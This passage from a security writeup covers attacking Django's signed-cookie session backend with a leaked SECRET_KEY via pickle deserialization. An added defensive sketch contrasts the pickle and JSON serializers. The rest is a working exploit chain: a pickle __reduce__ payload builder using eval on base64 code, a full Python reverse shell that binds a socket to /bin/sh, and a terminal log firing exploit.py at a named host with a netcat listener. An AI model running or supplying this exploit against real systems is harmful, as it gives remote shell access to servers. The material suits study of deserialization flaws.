- The session engine is "django.contrib.sessions.backends.signed_cookies"
- The SECRET_KEY is also present in the source code.
When signed_cookies is used, every cookie with a sessionid field is treated as serialized data and deserialized with pickle. Since pickle is unsafe as soon as it is applied to anything other than ordinary data types, we can follow the document here and complete the attack process. Note that the reference document also provides reference code that is well worth reading.
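As an added example (not part of the original writeup or of Django's code), this standalone Python 3 sketch mimics a signed-cookie session store to show why the serializer, not the signature, is the last line of defence once SECRET_KEY leaks: the pickle serializer executes the callable inside a correctly signed payload, while the JSON serializer that Django made the default in 1.6 rejects the same bytes, and a wrong key is caught either way. The cookie format, key and session values are constructed stand-ins, not Django's real implementation.

```python
import base64, hashlib, hmac, json, pickle

SECRET_KEY = b"leaked-secret-key"  # constructed stand-in for a leaked Django key

def sign(data: bytes, key: bytes) -> str:
    # Simplified cookie format base64(payload):hex(HMAC-SHA256); not Django's real one
    body = base64.urlsafe_b64encode(data).decode()
    mac = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}:{mac}"

def unsign(cookie: str, key: bytes) -> bytes:
    # Constant-time signature check, then hand back the raw payload bytes
    body, _, mac = cookie.rpartition(":")
    expected = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac, expected):
        raise ValueError("bad cookie signature")
    return base64.urlsafe_b64decode(body)

class PickleSerializer:
    # The old default: any __reduce__ callable inside the payload is executed
    loads = staticmethod(pickle.loads)

class JSONSerializer:
    # The hardened default: only literals come back, never code
    dumps = staticmethod(lambda obj: json.dumps(obj).encode())
    loads = staticmethod(json.loads)

def load_session(cookie: str, key: bytes, serializer):
    # Verify the HMAC first, then let the serializer interpret the bytes
    return serializer.loads(unsign(cookie, key))

class CookieGadget:
    # Harmless stand-in for a hostile object: unpickling calls str.upper()
    def __reduce__(self):
        return (str.upper, ("gadget executed",))

def demo():
    hostile = sign(pickle.dumps(CookieGadget()), SECRET_KEY)  # signer knows the key
    legit = sign(JSONSerializer.dumps({"user_id": 7}), SECRET_KEY)
    results = {"legit": load_session(legit, SECRET_KEY, JSONSerializer)}
    # Signature verifies, and pickle runs the callable instead of returning data
    results["pickle"] = load_session(hostile, SECRET_KEY, PickleSerializer)
    for name, key, ser in (("json", SECRET_KEY, JSONSerializer),
                           ("wrong_key", b"other-key", PickleSerializer)):
        try:
            load_session(hostile, key, ser)
            results[name] = "accepted"
        except ValueError:  # bad signature, or JSON refusing the pickle bytes
            results[name] = "rejected"
    return results
```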
With the following Python code, we can convert connback.py into pickle format so that the program is invoked as soon as pickle.loads() deserializes it.
```python
# Python 2 code from the writeup, re-indented; the two imports are added here
# (b64 is assumed to be base64.b64encode).
import pickle
from base64 import b64encode as b64

code = b64(open('connback.py').read())

class ex(object):
    def __reduce__(self):
        return (
            eval,
            ('str(eval(compile("%s".decode("base64"),"q","exec"))).strip("None")' % (code),)
        )

payload = pickle.dumps(ex())
```
And we can prepare a reverse shell as follows:
```python
# Python 2 code (connback.py) from the writeup, re-indented; the imports and the
# host/port placeholders are added here, since the page does not show them.
import os
import socket
import subprocess

host = "LISTENER_HOST"  # placeholder: address of the nc listener, not given on the page
port = 0                # placeholder: listener port, not given on the page

socket.setdefaulttimeout(60)
sok = None
try:
    sok = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sok.connect((host, port))
    sok.send('!P0Wn! Congratulation !!\n')
    save = [os.dup(i) for i in range(0, 3)]
    os.dup2(sok.fileno(), 0)
    os.dup2(sok.fileno(), 1)
    os.dup2(sok.fileno(), 2)
    shell = subprocess.call(["/bin/sh", "-i"])
    [os.dup2(save[i], i) for i in range(0, 3)]
    [os.close(save[i]) for i in range(0, 3)]
    os.close(sok.fileno())
except Exception:
    pass
```
Finally, we start nc to receive the reverse shell connection and execute exploit.py to obtain the shell.
```
bletchley@Viking:~/WorkSpace/2013_Django/pwp-master$ python exploit.py '1%idg#a2%byqh@l1wcv^3kc=e*($0v44(u-c^@bf_lz-@#essk' http://vuln-django.orange.tw
Sending payload, check you listenner
```